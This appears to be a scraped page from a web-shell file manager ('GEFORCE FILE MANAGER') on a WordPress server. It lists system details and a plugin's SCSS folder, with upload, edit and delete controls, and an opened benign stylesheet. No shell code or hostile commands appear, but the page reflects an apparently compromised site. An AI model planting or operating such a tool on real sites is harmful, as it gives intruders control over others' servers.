[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
src
/
admin
/
scss
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 admin.scss
681 B
SET
[ EDIT ]
|
[ DEL ]
📄 datatable.scss
395 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: admin.scss
.presto-inline-edit { &__text { display: inline; margin: 0; margin-right: 8px; } &__input { flex-grow: 1; max-width: 640px; input { height: 36px; } } .presto-inline-edit__button { margin-right: 4px; } &__edit { cursor: pointer; display: inline-flex; justify-content: center; align-items: center; width: 28px; height: 28px; border-radius: 50%; border: none; opacity: 0.5; color: #fff; background-color: var(--wp-admin-theme-color); &:hover { opacity: 1; background-color: var(--wp-admin-theme-color-darker-10); } } &--editing { align-items: stretch; } }